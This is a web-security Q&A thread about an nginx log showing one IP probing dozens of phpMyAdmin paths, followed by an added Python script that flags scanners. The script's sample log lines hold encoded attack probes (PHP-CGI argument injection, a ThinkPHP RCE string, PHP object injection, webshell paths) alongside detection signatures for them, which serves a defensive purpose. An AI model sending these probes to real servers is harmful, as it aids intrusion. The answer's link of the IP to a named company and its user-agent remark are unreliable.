[23/Mar/2020:03:29:16 +0000] "GET /db/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:16 +0000] "GET /dbadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:17 +0000] "GET /web/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:17 +0000] "GET /admin/pma/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:17 +0000] "GET /admin/PMA/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:18 +0000] "GET /admin/mysql/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:18 +0000] "GET /admin/mysql2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:18 +0000] "GET /admin/phpmyadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:19 +0000] "GET /admin/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:19 +0000] "GET /admin/phpmyadmin2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:19 +0000] "GET /mysqladmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:19 +0000] "GET /mysql-admin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:20 +0000] "GET /mysql_admin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:20 +0000] "GET /phpadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:20 +0000] "GET /phpAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:21 +0000] "GET /phpmyadmin0/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:21 +0000] "GET /phpmyadmin1/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:21 +0000] "GET /phpmyadmin2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:21 +0000] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:22 +0000] "GET /phpMyAdmin4.8.0/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:22 +0000] "GET /phpMyAdmin4.8.1/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:22 +0000] "GET /phpMyAdmin4.8.2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:23 +0000] "GET /phpMyAdmin4.8.3/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:23 +0000] "GET /phpMyAdmin4.8.4/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:23 +0000] "GET /phpMyAdmin4.8.5/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:23 +0000] "GET /myadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:24 +0000] "GET /myadmin2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:25 +0000] "GET /xampp/phpmyadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:25 +0000] "GET /phpMyadmin_bak/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:25 +0000] "GET /www/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:25 +0000] "GET /tools/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:26 +0000] "GET /phpmyadmin-old/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:26 +0000] "GET /phpMyAdminold/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:26 +0000] "GET /phpMyAdmin.old/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:27 +0000] "GET /pma-old/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:27 +0000] "GET /claroline/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:27 +0000] "GET /typo3/phpmyadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:28 +0000] "GET /phpma/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:28 +0000] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:28 +0000] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:28 +0000] "GET /phpMyAbmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:29 +0000] "GET /phpMyAdmin__/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
Kim darry
    Does this answer your question? [Webserver logs show someone is trying to hack my site, what should I do?](https://security.stackexchange.com/questions/5001/webserver-logs-show-someone-is-trying-to-hack-my-site-what-should-i-do), [Strange requests to web server](https://security.stackexchange.com/questions/40291/strange-requests-to-web-server). In short: just the usual noise if you put a system on the internet. Like someone trying the doorknob to see if the door is locked or not. – Steffen Ullrich Mar 23 '20 at 08:57

1 Answer


According to some passive info I've gathered on your attacker's IP, it seems to point to vanyang.com.cn, which looks like a legitimate manufacturing company based in Wenzhou, Zhejiang. They don't belong to any security blacklist, nor is there any security intelligence pointing towards them.

They are running an automatic basic recon tool to scan your website for vulnerabilities that they might use against you in case they can exploit them with a tool like nmap or nessus. This kind of traffic does not belong to a legitimate use case unless it's consented to, which I assume it's not. Furthermore, the user agent they are using is already pretty weird, since if they were spidering your website it would be good practice to use a very distinctive user agent that indicates they are using a bot, which they are trying to hide with a Chrome user agent.

There are 3 things that I find very weird about it though:

  1. Why is your website always answering with a 301? Are you redirecting all traffic to https while they are trying to access it through http?

  2. Why on earth is that company performing this kind of attack? Has their web server been hacked?

  3. Why on earth are you on their radar?

It looks to me that either way they are at the beginning of a possible attack; they are probably just scanning your website as they are doing for a thousand others. What I'd do is monitor your web server and make sure you can spot any anomaly in processes, network patterns or login attempts, in the same way you are monitoring the nginx logs.

Good job on spotting the attack and keep safe.

kudrom
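The monitoring the answer recommends can start from the access log itself. The following is an added example, not code from the question or the answer: it parses lines in the question's log format, percent-decodes the request paths, and scores each client on the signals that mark an automated scanner (rotating user agents, many distinct paths, every response non-2xx, hits on the probe families visible in the logs above). The log format, the handling of a comma-separated client field as an X-Forwarded-For list, and the sample lines (constructed, using documentation addresses) are assumptions.

```python
"""Flag automated vulnerability scanning in an nginx access log.

Added example for this thread, not code from the question or the answer.
Assumes the custom log format shown in the question (timestamp, request,
status, bytes, referer, user agent, client address as the last quoted field)
and that a comma-separated client field is an X-Forwarded-For list whose last
entry is the real peer. Sample lines are constructed with documentation IPs.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

LINE_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" '
    r'"(?P<ua>[^"]*)" "(?P<client>[^"]*)"\s*$'
)

# Probe families visible in the question's log, matched against the decoded
# request target plus the referer, user-agent and client fields.
PROBE_SIGNATURES = {
    "admin-panel-discovery": re.compile(r"/(?:phpmyadmin|pma\d*|myadmin|dbadmin)/", re.I),
    "webshell-probe": re.compile(r"/(?:shell|hell)\.php\b", re.I),
    "php-cgi-arg-injection": re.compile(r"/cgi-bin/php[^?\s]*\?.*-d[\s+]allow_url_include", re.I),
    "thinkphp-rce-probe": re.compile(r"invokefunction|HelloThinkPHP|HelloThinkCMF", re.I),
    "php-object-injection": re.compile(r'O:\d+:(?:"|\\x22)[A-Za-z_]'),  # serialized PHP object
    "sql-injection": re.compile(r"union\s+select", re.I),
}

# Constructed sample: one client behaving like the scanner in the question
# (rotating user agents, %-encoded probe paths, every request redirected)
# and one ordinary visitor.
SAMPLE_LOG = r"""
[23/Mar/2020:03:24:03 +0000] "GET /l.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" "203.0.113.5"
[23/Mar/2020:03:24:09 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "203.0.113.5"
[23/Mar/2020:03:24:26 +0000] "GET /shell.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "203.0.113.5"
[23/Mar/2020:03:24:43 +0000] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "203.0.113.5"
[23/Mar/2020:03:29:12 +0000] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" "}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{}, 203.0.113.5"
[23/Mar/2020:03:29:13 +0000] "GET /phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "203.0.113.5"
[23/Mar/2020:03:30:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Safari/605.1.15" "198.51.100.7"
"""


def parse_line(line):
    """Return one parsed record, or None for a line outside the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["ip"] = rec["client"].rsplit(",", 1)[-1].strip()  # last XFF entry = peer
    rec["decoded_uri"] = unquote(rec["uri"])  # expose %-encoded probe paths
    return rec


def classify(summary):
    """Two probe families, or rotating user agents whose requests all miss."""
    if len(summary["signatures"]) >= 2:
        return "scanner"
    if summary["distinct_uas"] >= 3 and summary["non_2xx_ratio"] >= 0.9:
        return "scanner"
    return "suspicious" if summary["signatures"] else "benign"


def analyze(lines):
    """Aggregate per-client signals over log lines; return {ip: summary}."""
    per_ip = defaultdict(lambda: {"paths": set(), "uas": set(), "times": [],
                                  "non_2xx": 0, "signatures": set()})
    for rec in filter(None, map(parse_line, lines)):
        s = per_ip[rec["ip"]]
        s["paths"].add(rec["decoded_uri"].split("?", 1)[0])
        s["uas"].add(rec["ua"])
        s["times"].append(rec["ts"])
        s["non_2xx"] += int(not 200 <= rec["status"] < 300)
        haystack = " ".join((rec["decoded_uri"], rec["referer"], rec["ua"], rec["client"]))
        s["signatures"].update(n for n, p in PROBE_SIGNATURES.items() if p.search(haystack))
    report = {}
    for ip, s in per_ip.items():
        n = len(s["times"])
        span = max((max(s["times"]) - min(s["times"])).total_seconds(), 60.0)  # >= 1 min
        report[ip] = {"requests": n, "distinct_paths": len(s["paths"]),
                      "distinct_uas": len(s["uas"]), "non_2xx_ratio": s["non_2xx"] / n,
                      "req_per_min": round(60 * n / span, 1),
                      "signatures": sorted(s["signatures"])}
        report[ip]["verdict"] = classify(report[ip])
    return report


if __name__ == "__main__":
    for ip, summary in analyze(SAMPLE_LOG.strip().splitlines()).items():
        print(ip, summary)
```

Feed it a real log with `analyze(open("access.log"))` and alert on any client whose verdict is not "benign"; the per-client summary also answers the answer's first question, since a non-2xx ratio of 1.0 shows the scanner never followed the 301s.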